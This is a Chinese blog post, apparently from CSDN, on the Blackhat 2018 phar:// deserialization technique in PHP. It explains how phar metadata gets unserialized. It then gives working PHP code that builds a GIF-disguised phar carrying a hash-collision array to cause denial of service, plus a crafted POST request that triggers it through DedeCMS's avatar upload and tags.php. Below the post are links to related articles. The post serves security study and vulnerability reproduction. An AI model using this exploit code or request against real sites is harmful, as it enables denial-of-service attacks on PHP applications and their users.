php利用phar进行ssrf,blackhat议题深入 | phar反序列化

最新推荐文章于 2021-05-26 07:48:05 发布
最新推荐文章于 2021-05-26 07:48:05 发布
阅读量262 收藏
点赞数

在Blackhat2018,来自Secarma的安全研究员Sam Thomas讲述了一种攻击 PHP 应用的新方式,利用这种方法可以在不使用unserialize()函数的情况下触发 PHP 反序列化漏洞。

漏洞原理

漏洞触发点在使用phar://协议读取文件的时候,文件内容会被解析成phar对象,然后phar对象内的Metadata信息会被反序列化。其实这个漏洞点并不是第一次出现,早在hitcon2017就被Orange大佬用来出CTF题了(见baby^h-master-php-2017)。

从PHP官方手册中我们可以看到Meta-data是用serialize()生成并保存在phar文件中的:

6fc554290abb52eaf1afeebfd1ddf26e.png

跟进PHP内核可以看到,当内核调用phar_parse_metadata()解析metadata数据时,会调用php_var_unserialize()对其进行反序列化操作,因此会造成反序列化漏洞。

d1fd1f259544d345602be5f42a1d14f0.png

漏洞利用

在Sam Thomas的举出的例子中可以看到,该漏洞主要通过利用魔术方法__destruct或__wakeup构造利用链,但是在实战环境里往往较难找到可以直接通过魔术方法触发的漏洞点。

由于通过反序列化可以产生任意一种数据类型,因此我想到了PHP的一个很古老的漏洞:PHP内核哈希表碰撞攻击(CVE-2011-4885)。在PHP内核中,数组是以哈希表的方式实现的,攻击者可以通过巧妙的构造数组元素的key使哈希表退化成单链表(时间复杂度从O(1) => O(n))来触发拒绝服务攻击。

d2727b790fe060ca89c00a0318e0f8a1.png

PHP修复此漏洞的方式是限制通过$_GET或$_POST等方式传入的参数数量,但是如果PHP脚本通过json_decode()或unserialize()等方式获取参数,依然将受到此漏洞的威胁。

接下来的漏洞利用思路就很明显了:构造一串恶意的serialize数据(能够触发哈希表拒绝服务攻击),然后将其保存到phar文件的metadata数据区,当文件操作函数通过phar://协议对其进行操作的时候就会触发拒绝服务攻击漏洞!

我们可以通过如下代码生成一个恶意的phar文件:

set_time_limit(0);

$size= pow(2, 16);

$array = array();

for($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) {

$array[$key] = 0;

}

$new_obj = newstdClass;

$new_obj->hacker = $array;

$p = newPhar(__DIR__. '/avatar.phar', 0);

$p['hacker.php'] = '<?php ?>';

$p->setMetadata($new_obj);

$p->setStub('GIF<?php __HALT_COMPILER();?>');

然后通过如下代码测试拒绝服务攻击效果:

$startTime = microtime(true);

file_exists("phar://avatar.phar");

$endTime = microtime(true);

echo'执行时间: '.($endTime - $startTime). ' 秒';

在我的机器上的测试效果:

2a3d58614ba6ca5dfcd22683eff9b363.png

漏洞实例复现

这里我要利用DedeCMS一个很出名的漏洞点,这个漏洞最初被用于探测后台目录,之后在“巅峰极客”比赛中被当做SSRF攻击利用,现在我要利用这个漏洞点构造phar反序列化来产生拒绝服务攻击!

首先通过织梦的头像上传点来上传phar文件(avatar.jpg)

文件位置: /member/edit_face.php

179713a06c60af5b073953423f525330.png

由于DedeCMS默认的上传文件大小被限制为50K,所以我们要修改一下配置文件:

找到dataconfig.cache.inc.php,

把$cfg_max_face修改为5000

d353706008c16a4ab1767629d1620d28.png

上传成功后就会显示出文件的相对路径,然后直接构造如下数据包即可验证漏洞:

POST /uploads/tags.php HTTP/1.1

Host: 127.0.0.1

Content-Type: application/x-www-form-urlencode

Content-Length: 136

dopost=save&_FILES[lsa][tmp_name]=phar://uploads/userup/3/myface.jpg&_FILES[lsa][name]=0&_FILES[lsa][size]=0&_FILES[lsa][type]=image/gif

参考

[1] https://www.lorexxar.cn/2017/11/10/hitcon2017-writeup/

[2] http://php.net/manual/en/book.phar.php

[3] https://blog.ripstech.com/2018/new-php-exploitation-technique/

[4] http://www.laruence.com/2011/12/30/2435.html

[5] https://raw.githubusercontent.com/s-n-t/presentations/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf

米饭遥
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SSRF中phar协议和gopher协议的利用
weixin_44687621的博客
09-07 986
我们在学习SSRF漏洞的时候,经常会只关注file协议等,因为利用方式简单。实际上随着php版本的提升和编程技术的规范,能够直接利用的漏洞越来越少了,所以学习使用phar和gopher协议是很有必要的。 phar协议 在php中反序列漏洞,形成的原因首先需要一个unserialize()函数来处理我们传入的可控的序列化payload。但是如果对unserialize()传入的内容进行限制,甚至就不存在可利用的unserialize()函数的时候,就可以借助phar协议触发反序列化操作了 phar流包装器不能
利用PHAR协议进行PHP反序列化攻击1
08-03
PHP反序列化攻击利用PHAR协议详解】 PHP反序列化攻击是一种常见的安全漏洞利用方式,其中PHARPhp ARchive)协议是这类攻击的一个关键路径。PHARPHP中用于打包和分发代码的机制,类似于Java的JAR文件。在PHP ...
php利用phar进行ssrf,php phar反序列化任意执行代码
weixin_34489089的博客
03-11 398
2018年原理一。关于流包装stream wrapper大多数的文件操作允许使用各种URL协议去访问文件路径,如data://,zlib://,php://例如常见的有include('php://filter/read=convert.base64-encode/resource=index.php')include('data://text/plain;base64,xxxxx')phar:/...
php利用phar进行ssrf,DedeCMS 后台存在SSRF漏洞
weixin_30650955的博客
03-11 150
dedecms的后台存在ucenter功能,可以直接修改ucenter的配置,使网站的mysql连接。指向我们预先构造的rogue mysql server https://github.com/Gifts/Rogue-MySql-Server.git设置之后我们就可以通过修改恶意服务端的设置来读取任意文件。 假如读取的文件路径是以phar协议开头的,那么读取的文件内容就会被反序列化。 根据ded...
反序列化漏洞利用工具_深入理解PHP Phar反序列化漏洞原理及利用方法(一)
weixin_39939530的博客
12-10 480
概述Phar反序列化漏洞是一种较新的攻击向量,用于针对面向对象的PHP应用程序执行代码重用攻击,该攻击方式在Black Hat 2018会议上由安全研究员Sam Thomas公开披露。类似于对编译二进制文件的ROP(Return-oriented Programming)攻击,这种类型的漏洞利用PHP对象注入(POI),这是面向对象的PHP代码上下文中的一种面向属性的编程(POP)。由...
master php,[hitcon2017] Baby^H-master-php-2017 复现
weixin_39625098的博客
03-13 316
分享本题自制Dockerfile : Github这题在比赛过程是0解......真的太难了...体现了Orange大大对php和中间件的深刻理解Orz 膜拜题目源码:$FLAG = create_function("", 'die(`/read_flag`);');$SECRET = `/read_secret`;$SANDBOX = "/var/www/data/" . md5("orange...
phpphar包的使用教程详解
10-17
本文将详细介绍如何在PHP中使用`phar`包进行打包和解压操作。 首先,确保`phar`扩展在你的PHP环境中已经启用。你需要检查并修改`php.ini`配置文件,将`phar.readonly`设置为`Off`,这样你才能创建和修改`phar`文件...
PHPphar包的使用教程
10-19
PHP中,`phar`(PHP Archive)是一种文件格式,允许开发者将多个PHP文件、资源和其他相关文件打包成单一的可执行文件,类似于Java的JAR文件。自PHP 5.3版本起,`phar`被引入,提供了一种高效且方便的方式来管理和...
PharTools:一个强大PHP-CLI工具,用于管理pharPHP-Archive)文件
05-26
Phar工具 PharTools是功能强大PHP命令行工具,用于管理pharPHP存档)文件。 它允许创建,提取,编辑和查看phar档案。 它还包括一个简单的API,可在您自己的脚本上实现PharTools功能。 特征: 创建Phar档案 提取...
mix-phar-skeleton:Phar命令行程序开发框架
04-24
Mix Phar Skeleton 命令行单执行文件 Phar 开发程序骨架,Mix 封装的命令行基础设施在骨架中都可使用。 我们提供了打包工具 ,可以将本项目打包为 Phar 文件(就像 golang 编译成执行文件一样)。 PHP 原本就是一个...
SSRF漏洞的攻击与防御
公众号shadow sock7
10-15 2054
SSRF的成因看具体的后端实现TCP请求的库: 比如curl、php里的file_get_contents、fsockopen、Java里的openStream,HttpClient类,URLConnection等 https://drops.org.cn/PENETRATION/SSRF-Gopher-Attack-NoteBook.html 发起请求的库不同,决定了可以发起什么样类型的请求。 ...
20210226web渗透学习之SSRF总结
qq_45290991的博客
05-26 1162
翻译作者:国勇(信安之路特约作者) 原文地址:https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978 SSRF 是什么 服务器端请求伪造(SSRF)是指攻击者能够通过存在漏洞的 web 应用程序发送黑客制造的请求 简单来说,黑客可以告诉服务器一个网址,服务器负责去请求这个网址。 例如: GET /?url=http://google.com/H
php phar 反序列化,phar反序列化
weixin_39651488的博客
03-20 292
phar原理:一个标志,格式为xxx,前面内容不限,但必须以__HALT_COMPILER();?>来结尾,否则phar扩展将无法识别这个文件为phar文件。ps:要将php.ini中的 phar.readonly选项设置为Off。一个例子序列化class TestObject {}$phar = new Phar("phar.phar"); //后缀名必须为phar$phar->st...
BlackHat2020议题之Web缓存投毒
一个安全研究员
08-10 1186
也就码了一天
phar反序列化
weixin_33935777的博客
09-12 360
参考文献:https://xz.aliyun.com/t/2715https://www.jianshu.com/p/19e3ee990cb7 phar原理: 一个标志,格式为xxx<?php xxx;__HALT_COMPILER();?>,前面内容不限,但必须以__HALT_COMPILER(...
PHP反序列化漏洞
weixin_43610673的博客
02-26 884
序列化与反序列: 序列化 (Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。 其实就是将数据转化成一种可逆的数据结构,反序列化就是其逆向的过程。 序列化的目的是方便数据的传输和存储。 在PHP应用中,序列化和反序列化一般用做缓存,比如sessio.........
php unset ctf,CTF PHP反序列化
weixin_33897367的博客
03-12 321
序列化所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回php原来的值。 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。 --php官方文档魔术方法构造函数和析构函数__construct() 具有构造函数的类会在每次创建新对象时先调用此方法,所以非常适合在使用对象之前做一些...
csrf攻击原理与解决方法_信息安全工程师(第二版)章二:网络攻击原理与常用方法...
weixin_39914499的博客
11-24 434
“知己知彼,百战不殆”一、网络攻击概念指损害网络系统安全属性的危害行为。危害行为导致网络系统的机密性、完整性、可用性、可控性、真实性、抗抵赖性受到不同程度的破坏。常见危害行为有四个基本类型:信息泄露攻击完整性破坏攻击拒绝服务攻击非法使用攻击(任何攻击最终都可以归纳为对机密性、完整性、可用性、可控性、真实性、抗抵赖性中一个或多个属性的破坏)二、攻击模型2-1 攻击树模型起源:故障树分析方法,Schn...
cppcheck cve漏洞
最新发布
08-19
Cppcheck本身并不提供CVE漏洞的检测能力。CVE(Common Vulnerabilities and Exposures)是一个公共漏洞和曝光的命名系统,用于标识和跟踪已知的安全漏洞。 然而,Cppcheck可以帮助您检测一些常见的安全问题和代码缺陷,这可能有助于您发现潜在的漏洞。Cppcheck可以检查以下类型的问题: - 空指针解引用 - 数组越界访问 - 内存泄漏 - 未初始化变量使用 - 不安全的函数使用(如strcat、strcpy等) - 使用已经释放的内存 - 使用未定义的行为等 虽然Cppcheck可以提供一定的代码质量和安全性检查,但它并不能完全替代专门的漏洞扫描工具或静态代码分析工具。如果您关注CVE漏洞的检测和修复,建议使用其他专门针对安全漏洞的工具,如静态代码分析工具(例如Clang Static Analyzer、Coverity等)或漏洞扫描工具(例如Nessus、OpenVAS等)。 请注意,CVE漏洞是不断更新和发现的,因此定期保持代码更新和使用最新版本的库和框架是非常重要的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值